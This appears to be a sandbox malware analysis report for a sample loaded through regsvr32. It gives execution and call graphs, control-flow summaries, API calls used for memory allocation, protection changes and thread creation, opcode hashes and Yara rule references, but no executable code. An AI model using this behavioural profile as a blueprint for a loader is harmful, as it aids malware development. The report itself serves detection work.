                                                                                                                                                                      • Associated: 0000000A.00000002.1723937905.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateErrorLastMutex
                                                                                                                                                                      • String ID: jmuZVxzUSQKZJ
                                                                                                                                                                      • API String ID: 1925916568-1615886713
                                                                                                                                                                      • Opcode ID: 97f4a8950689e7290d3bb4c401befd14a09affdda078bd002e7cbc94f52d7475
                                                                                                                                                                      • Instruction ID: 0594eaefbf50b0c8ed9c9a89b72dfe51cd43608961eacb7f94053228cce8ae52
                                                                                                                                                                      • Opcode Fuzzy Hash: 97f4a8950689e7290d3bb4c401befd14a09affdda078bd002e7cbc94f52d7475
                                                                                                                                                                      • Instruction Fuzzy Hash: 32D017B044A304FAE3008F50DE4DB587EA4EB10702F208036E2026A2D4E3F85A45564A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:20.1%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                      Total number of Nodes:49
                                                                                                                                                                      Total number of Limit Nodes:10
                                                                                                                                                                      execution_graph 1487 9f260b 1488 9f2620 1487->1488 1493 9f183e VirtualAlloc 1488->1493 1490 9f2643 1495 9f13c3 VirtualProtect 1490->1495 1494 9f18cd 1493->1494 1494->1490 1496 9f1443 1495->1496 1497 9f147c VirtualProtect 1496->1497 1498 9f14c2 1497->1498 1499 9f1589 VirtualProtect 1500 9f1616 1499->1500 1500->1499 1501 9f16c7 1500->1501 1502 4ab4f54 1506 4ab4fcb 1502->1506 1503 4ab506d VirtualProtect VirtualProtect 1503->1506 1504 4ab521a VirtualProtect 1504->1506 1505 4ab55e8 1506->1503 1506->1504 1506->1505 1507 4ab5329 VirtualAlloc 1506->1507 1509 4be8580 1506->1509 1507->1506 1511 4be85ba 1509->1511 1510 4be868d 1510->1506 1511->1510 1513 4be9440 1511->1513 1515 4be9494 1513->1515 1514 4beb6f1 1514->1511 1515->1514 1519 4be1443 1515->1519 1523 4beb882 VirtualAlloc 1515->1523 1526 4be1640 1515->1526 1520 4be146b VirtualFree 1519->1520 1521 4be1447 1519->1521 1520->1521 1521->1520 1522 4be14b6 1521->1522 1522->1515 1524 4beb7ee 1523->1524 1524->1523 1525 4beb81b 1524->1525 1525->1515 1528 4be168f 1526->1528 1527 4be8274 1527->1515 1528->1527 1533 4bec7a0 1528->1533 1537 4bebd50 1528->1537 1541 4bebb82 1528->1541 1545 4bec5f4 CreateFileMappingW 1528->1545 1534 4bec820 1533->1534 1535 4bec95a 1534->1535 1536 4bec8c0 NtCreateThreadEx 1534->1536 1535->1528 1536->1534 1538 4bebdee 1537->1538 1538->1538 1539 4bebef9 1538->1539 1540 4bebe96 MapViewOfFile 1538->1540 1539->1528 1540->1538 1542 4bebb85 FindCloseChangeNotification 1541->1542 1544 4bebb07 1541->1544 1542->1544 1543 4bebb59 1543->1528 1544->1541 1544->1543 1546 4bec5b9 1545->1546 1546->1545 1547 4bec676 1546->1547 1547->1528

                                                                                                                                                                      Callgraph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      • Opacity -> Relevance
                                                                                                                                                                      • Disassembly available
                                                                                                                                                                      callgraph 0 Function_04BEB9BC 1 Function_009F1E9B 3 Function_009F249A 1->3 16 Function_009F128F 1->16 2 Function_009F1E9A 2->3 2->16 4 Function_009F2499 5 Function_009F4098 6 Function_04AB4AAC 7 Function_009F1C96 8 Function_009F1095 9 Function_009F1995 53 Function_009F1218 9->53 10 Function_009F2694 107 Function_009F1169 10->107 11 Function_04AB16A0 12 Function_04BEB7B5 13 Function_04BEB9B0 14 Function_04BE8DB0 15 Function_04AB20A4 51 Function_04AB1ED4 15->51 104 Function_04AB2C58 15->104 17 Function_009F1A8E 16->17 17->3 18 Function_009F138A 19 Function_009F1589 19->107 20 Function_04AB1ABC 21 Function_04AB1EB1 22 Function_04AB4AB0 23 Function_04BEC7A0 24 Function_009F11BA 24->3 25 Function_04AB4A80 26 Function_04AB1185 27 Function_04BE8290 28 Function_009F17A3 29 Function_04BEB882 30 Function_04BEBB82 92 Function_04BECA64 30->92 31 Function_04BE8580 113 Function_04BE9440 31->113 32 Function_009F30A0 33 Function_009F10DA 34 Function_04BEC5F4 35 Function_04BE13EC 36 Function_04AB12F8 37 Function_009F14C8 38 Function_009F13C3 38->53 38->107 39 Function_009F23C3 40 Function_009F30C1 41 Function_04BE10E0 42 Function_04BEBFE0 42->0 43 Function_04AB4EF4 44 Function_04AB1DF4 45 Function_009F26FE 46 Function_04BE90D8 47 Function_04BE90D0 48 Function_009F10E8 49 Function_04BE10C4 50 Function_04BE10C0 52 Function_009F181F 52->3 54 Function_04AB1C22 55 Function_04BEC533 56 Function_009F1211 57 Function_04AB1525 58 Function_04BE1630 59 Function_04BEC230 60 Function_04AB3724 61 Function_009F400F 62 Function_009F260B 62->1 62->24 62->28 62->38 62->48 71 Function_009F183E 62->71 63 Function_04AB313C 64 Function_009F4007 65 Function_009F4005 66 Function_009F2705 67 Function_04AB5830 68 Function_04BE9120 69 Function_04BED120 69->49 70 Function_009F1000 70->3 70->16 71->9 71->107 72 Function_009F103B 73 Function_009F5039 74 Function_04BEB818 75 Function_009F3038 76 Function_04AB4B0C 77 Function_009F1735 78 Function_04AB1000 78->22 79 Function_04BEC515 80 Function_009F5031 81 Function_04BECF10 82 Function_04BE1010 83 Function_009F5027 84 Function_04BE1000 85 Function_04AB5862 86 Function_009F5052 87 Function_04AB2D78 87->43 88 Function_009F1148 88->3 89 Function_04BE1369 90 Function_009F1546 91 Function_009F2345 93 Function_04AB3870 93->87 93->93 103 Function_04AB3858 93->103 94 Function_04BECA60 95 Function_009F1740 96 Function_04AB5874 97 Function_04AB564C 98 Function_009F1077 98->3 99 Function_009F2672 99->28 100 Function_04BEBD50 101 Function_009F1270 101->3 102 Function_04AB5859 104->51 105 Function_04AB5658 106 Function_009F276B 108 Function_009F1068 109 Function_009F1266 110 Function_04AB5851 111 Function_04BEB745 112 Function_04BE1443 113->29 113->84 113->112 114 Function_04BE1640 113->114 114->23 114->30 114->34 114->46 114->58 114->100 115 Function_04BEC540 116 Function_04AB4F54 116->15 116->31 116->60 116->76 116->93

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 04AB4F54 Relevance: 6.5, APIs: 4, Instructions: 502memoryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 142 4ab4f54-4ab4fc9 143 4ab4fcb 142->143 144 4ab5002-4ab5007 142->144 145 4ab4fcd-4ab5000 143->145 146 4ab500a-4ab5019 144->146 145->144 145->145 147 4ab501c-4ab5031 146->147 148 4ab5037-4ab503d 147->148 149 4ab504a-4ab5053 148->149 150 4ab503f-4ab5048 148->150 151 4ab5059-4ab5067 149->151 152 4ab55f6-4ab5645 149->152 150->148 153 4ab506d-4ab50fb VirtualProtect * 2 151->153 154 4ab5100-4ab5108 151->154 152->148 153->146 155 4ab5209-4ab5214 154->155 156 4ab510e-4ab5204 call 4ab3870 * 2 call 4ab4b0c call 4ab3870 154->156 157 4ab521a-4ab528b VirtualProtect call 4ab3870 155->157 158 4ab52b9-4ab52c1 155->158 172 4ab52ae-4ab52b4 156->172 167 4ab5290-4ab52ab 157->167 162 4ab539c-4ab53a7 158->162 163 4ab52c7-4ab52d3 158->163 165 4ab55e8-4ab55f3 162->165 166 4ab53ad-4ab53b5 162->166 168 4ab52d5-4ab52dd 163->168 170 4ab53bb-4ab54d0 call 4ab3734 call 4be8580 166->170 171 4ab54e0-4ab54e8 166->171 167->172 168->168 173 4ab52df-4ab538a call 4ab3870 call 4ab3724 VirtualAlloc call 4ab20a4 168->173 192 4ab54d3-4ab54db 170->192 177 4ab54ee-4ab5507 171->177 178 4ab5581-4ab558c 171->178 172->147 196 4ab538f-4ab5397 173->196 183 4ab550d-4ab5554 177->183 178->165 181 4ab558e-4ab5596 178->181 181->148 187 4ab559c-4ab55e3 call 4ab20a4 * 2 181->187 183->183 184 4ab5556-4ab557c call 4ab20a4 183->184 184->146 187->146 192->146 196->146
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04AB50A5
                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04AB50F0
                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04AB525B
                                                                                                                                                                      • VirtualAlloc.KERNELBASE(?,?,00000000,?), ref: 04AB535F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.1729574408.0000000004AB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04AB1000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4ab1000_regsvr32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Virtual$Protect$Alloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2541858876-0
                                                                                                                                                                      • Opcode ID: 39477be30a65f733cde077695c3ee4cbe3a09229865f7a03940c50a9a6ecadae
                                                                                                                                                                      • Instruction ID: 18c56d7f6e0f1a1c7331d1605cdfd5533ddc9c8510f7c201ff273830d63f15b4
                                                                                                                                                                      • Opcode Fuzzy Hash: 39477be30a65f733cde077695c3ee4cbe3a09229865f7a03940c50a9a6ecadae
                                                                                                                                                                      • Instruction Fuzzy Hash: 9C128172E001189FEB14CF69CC44BEAB7B6BFC8314F568299D459AB355DA30AD42CF90
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 04BEC7A0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 195nativethreadCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 214 4bec7a0-4bec81c 215 4bec820-4bec855 214->215 215->215 216 4bec857-4bec889 215->216 217 4bec88c-4bec88e 216->217 218 4bec988-4beca59 217->218 219 4bec894-4bec89e 217->219 218->217 220 4bec8a4-4bec8ae 219->220 221 4bec970-4bec983 219->221 223 4bec95a-4bec96d 220->223 224 4bec8b4-4bec8be 220->224 221->217 225 4bec91b-4bec925 224->225 226 4bec8c0-4bec916 NtCreateThreadEx 224->226 228 4bec927-4bec931 225->228 229 4bec943-4bec955 225->229 226->217 228->217 230 4bec937-4bec93e 228->230 229->217 230->217
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtCreateThreadEx.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 04BEC8FE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.1729806726.0000000004BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BE1000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4be1000_regsvr32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID: ?r@
                                                                                                                                                                      • API String ID: 2422867632-220736958
                                                                                                                                                                      • Opcode ID: 8dba886e75413ff0145a5f8cf837d9aaea0fd1d7fee53a087049fd229f6a51ce
                                                                                                                                                                      • Instruction ID: aacfbf5049b5fb6fa875f56b6f0c2ca91c4bbfe678f9c4ca0cf15cf7452c2eda
                                                                                                                                                                      • Opcode Fuzzy Hash: 8dba886e75413ff0145a5f8cf837d9aaea0fd1d7fee53a087049fd229f6a51ce
                                                                                                                                                                      • Instruction Fuzzy Hash: 75719D77A083048FD714CE6AC88066ABBF3FBC8314F568A1CE595AB314D775B816CB85
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 04BEC5F4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 231 4bec5f4-4bec648 CreateFileMappingW 232 4bec64a-4bec659 231->232 233 4bec5b9-4bec5bb 232->233 234 4bec5bd-4bec5cc 233->234 235 4bec5d1-4bec5d7 233->235 236 4bec6a2-4bec6a7 234->236 237 4bec68d-4bec69c 235->237 238 4bec5dd-4bec5e5 235->238 236->233 237->236 239 4bec6ac-4bec78e 238->239 240 4bec5eb-4bec5f3 238->240 239->232 240->231 241 4bec65e-4bec666 240->241 242 4bec688-4bec68b 241->242 243 4bec668-4bec670 241->243 242->236 243->233 245 4bec676-4bec685 243->245
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileMappingW.KERNELBASE(?,?,?,?,?,?), ref: 04BEC62C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.1729806726.0000000004BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BE1000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4be1000_regsvr32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFileMapping
                                                                                                                                                                      • String ID: t:C*
                                                                                                                                                                      • API String ID: 524692379-3960102273
                                                                                                                                                                      • Opcode ID: 2f5c534fc63be93d15f6b3375b1b31b09a23b6c17ce9c6a52d31f5bc1375677c
                                                                                                                                                                      • Instruction ID: 744bae32440b8e1decc9beb03f21ba375bec51e0425829a2793239e001d988d5
                                                                                                                                                                      • Opcode Fuzzy Hash: 2f5c534fc63be93d15f6b3375b1b31b09a23b6c17ce9c6a52d31f5bc1375677c
                                                                                                                                                                      • Instruction Fuzzy Hash: A9510A76E00119CFCB14CFA9D845AAEBBB2FFC8310F268199D518BB255D735B9528F80
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 04BEB882 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 121memoryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 254 4beb882-4beb8b7 VirtualAlloc 255 4beb7ee-4beb7f7 254->255 256 4beb8bc-4beb99f 255->256 257 4beb7fd-4beb807 255->257 258 4beb80f-4beb819 257->258 259 4beb809-4beb80d 257->259 260 4beb82a-4beb834 258->260 261 4beb81b-4beb829 258->261 263 4beb872-4beb87c 259->263 264 4beb84f-4beb859 260->264 265 4beb836-4beb84d 260->265 263->254 263->255 264->263 266 4beb85b-4beb870 264->266 265->263 266->263
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 04BEB8AF
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.1729806726.0000000004BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BE1000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4be1000_regsvr32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID: yE|
                                                                                                                                                                      • API String ID: 4275171209-1893469338
                                                                                                                                                                      • Opcode ID: a6d16088afe614d6d644b710a7cdcaa4e579c73eb70ab4dbe9e83108efc988d9
                                                                                                                                                                      • Instruction ID: 3194458b1b1c4db70a4326aa0318460b5aaf6e09b03635cc44a0fc9e3383c386
                                                                                                                                                                      • Opcode Fuzzy Hash: a6d16088afe614d6d644b710a7cdcaa4e579c73eb70ab4dbe9e83108efc988d9
                                                                                                                                                                      • Instruction Fuzzy Hash: 42417B366092418FD314CE26D980A6FB7E3FFC5314F69CA5CE1958B298DB74E8028B42
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 04BEBD50 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 315 4bebd50-4bebdea 316 4bebdee-4bebe10 315->316 316->316 317 4bebe12-4bebe33 316->317 318 4bebe39-4bebe43 317->318 319 4bebe5a-4bebe64 318->319 320 4bebe45-4bebe55 318->320 322 4bebe78-4bebe82 319->322 323 4bebe66-4bebe76 319->323 321 4bebee9-4bebef3 320->321 321->318 324 4bebef9-4bebf09 321->324 325 4bebe8a-4bebe94 322->325 326 4bebe84-4bebe88 322->326 323->321 327 4bebedd-4bebee7 325->327 328 4bebe96-4bebedb MapViewOfFile 325->328 326->321 327->321 329 4bebf0c-4bebfd9 327->329 328->321 329->321
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.1729806726.0000000004BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BE1000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4be1000_regsvr32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: ded5706c8cf18b489a2db035f62cabe521a8b8f48e825381445d785b50f9569b
                                                                                                                                                                      • Instruction ID: f9794404df8a4121b099409316ae1c4c84b151df54ebe8a6228b072ccdf0a949
                                                                                                                                                                      • Opcode Fuzzy Hash: ded5706c8cf18b489a2db035f62cabe521a8b8f48e825381445d785b50f9569b
                                                                                                                                                                      • Instruction Fuzzy Hash: FD717A76A082408FD714CF2AC981A6AB7E2FFC8310F15892DE599DB754D735F805CB82
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 04BEBB82 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 332 4bebb82-4bebb83 333 4bebb07-4bebb09 332->333 334 4bebb85-4bebbbe FindCloseChangeNotification 332->334 336 4bebb0b-4bebb22 333->336 337 4bebb27-4bebb37 333->337 335 4bebbc1-4bebbcf 334->335 335->333 340 4bebbf1-4bebbf5 336->340 338 4bebb3d-4bebb47 337->338 339 4bebbfa-4bebcde call 4beca64 337->339 341 4bebbed 338->341 342 4bebb4d-4bebb57 338->342 351 4bebce0-4bebd1b 339->351 340->333 341->340 343 4bebb6d-4bebb77 342->343 344 4bebb59-4bebb6c 342->344 346 4bebb79-4bebb7f 343->346 347 4bebbd4-4bebbeb 343->347 346->332 347->340 351->351 352 4bebd1d-4bebd3c 351->352 352->335
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 04BEBBA2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.1729806726.0000000004BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BE1000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4be1000_regsvr32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2591292051-0
                                                                                                                                                                      • Opcode ID: 50d2089abb113a841146babe8ba23f3502976d877d7731df3cd26707d1ca1d2e
                                                                                                                                                                      • Instruction ID: 9085c8e4942e74386fc9981411317eccd1dd752944e542dd503ac197a792abed
                                                                                                                                                                      • Opcode Fuzzy Hash: 50d2089abb113a841146babe8ba23f3502976d877d7731df3cd26707d1ca1d2e
                                                                                                                                                                      • Instruction Fuzzy Hash: BC518236A082548FC724CF29C88066AF7E2FFC9314F16866DD895AB255DB71BC06DF81
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 04BE1443 Relevance: 1.4, APIs: 1, Instructions: 136COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 353 4be1443-4be1445 354 4be146b-4be1498 VirtualFree 353->354 355 4be1447 353->355 357 4be149c-4be14a8 354->357 356 4be1448-4be144a 355->356 358 4be15c7-4be1628 356->358 359 4be1450-4be145a 356->359 357->356 358->357 360 4be15ba 359->360 361 4be1460-4be146a 359->361 362 4be15be-4be15c2 360->362 361->354 364 4be14aa-4be14b4 361->364 362->356 365 4be14cc-4be14d6 364->365 366 4be14b6-4be14c9 364->366 367 4be14dc-4be14e6 365->367 368 4be15a4-4be15b8 365->368 369 4be158f-4be15a2 367->369 370 4be14ec-4be14f6 367->370 368->362 369->362 370->356 371 4be14fc-4be158a 370->371 371->356
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualFree.KERNELBASE(?,?,?), ref: 04BE148F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.1729806726.0000000004BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BE1000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4be1000_regsvr32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                                                      • Opcode ID: d73e3cb1c658586925c0d0139279a8afd790382baf56333e65cc204470eb0b4e
                                                                                                                                                                      • Instruction ID: feae9842e4df009069918ceb6f8e4551da4a3eb6a0f26906a576d01039d31be4
                                                                                                                                                                      • Opcode Fuzzy Hash: d73e3cb1c658586925c0d0139279a8afd790382baf56333e65cc204470eb0b4e
                                                                                                                                                                      • Instruction Fuzzy Hash: CE514A776182028FD304CF6DC84066AB7E2FBC9314F668959E4A5E7354D774F8468B82
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 009F13C3 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131memoryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 200 9f13c3-9f14bc VirtualProtect call 9f1169 call 9f1218 call 9f1169 VirtualProtect 207 9f14c2-9f1587 200->207 208 9f15f0-9f160b 200->208 207->208 210 9f16c7-9f1730 call 9f1169 208->210 211 9f1611 208->211 211->210
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.1728857865.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_9f0000_regsvr32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                      • String ID: `
                                                                                                                                                                      • API String ID: 544645111-2679148245
                                                                                                                                                                      • Opcode ID: 35885461371359cf0a8ae869d8d00e64306f89dec14caddbe3f6b3ca391e81d3
                                                                                                                                                                      • Instruction ID: 171b708761410876b53bb90da89054e34c065a90dfee13a456383c364aec1eb6
                                                                                                                                                                      • Opcode Fuzzy Hash: 35885461371359cf0a8ae869d8d00e64306f89dec14caddbe3f6b3ca391e81d3
                                                                                                                                                                      • Instruction Fuzzy Hash: 965198B4A04208CFCB14CF99C594AADFBF1BF88310F25856AE919AB356D335A845CF80
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 009F1589 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 93memoryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 247 9f1589-9f15ee VirtualProtect 248 9f1616-9f163e 247->248 249 9f16c7-9f1730 call 9f1169 248->249 250 9f1644-9f16bc 248->250 250->248 251 9f16c2 250->251 251->247
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.1728857865.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_9f0000_regsvr32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                      • String ID: `
                                                                                                                                                                      • API String ID: 544645111-2679148245
                                                                                                                                                                      • Opcode ID: 178ae2c4dd4dd52d34ee1ac3efb5c9347ad385608b7a7732149c4992fc42327e
                                                                                                                                                                      • Instruction ID: 79fc069cc5a764c6d2237e73e972d8229a583274b80006b8356038432d755344
                                                                                                                                                                      • Opcode Fuzzy Hash: 178ae2c4dd4dd52d34ee1ac3efb5c9347ad385608b7a7732149c4992fc42327e
                                                                                                                                                                      • Instruction Fuzzy Hash: 50417EB5E00228CFDB64CF08C980B99BBB1FF48314F158199CA09AB356D376AD91CF91
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 009F183E Relevance: 1.3, APIs: 1, Instructions: 85memoryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 373 9f183e-9f1903 VirtualAlloc call 9f1995 call 9f1169 378 9f191f-9f1994 call 9f2207 call 9f1c00 373->378 379 9f1905-9f191c 373->379 379->378
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.1728857865.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_9f0000_regsvr32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: f3c9147b189ce0d0eb7677fafc571dd273274938a01293aeed3a82b9e13633f6
                                                                                                                                                                      • Instruction ID: 630a59fdb24d3e95f5e163266bd9f75802cce177914d49a40c8f3aa84be451b1
                                                                                                                                                                      • Opcode Fuzzy Hash: f3c9147b189ce0d0eb7677fafc571dd273274938a01293aeed3a82b9e13633f6
                                                                                                                                                                      • Instruction Fuzzy Hash: 3F41E2B09012098FDB04DF94C554BAEBBF0FF48308F25856DD858AB351D776A986CF91
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:21.1%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                      Signature Coverage:1.7%
                                                                                                                                                                      Total number of Nodes:1498
                                                                                                                                                                      Total number of Limit Nodes:22
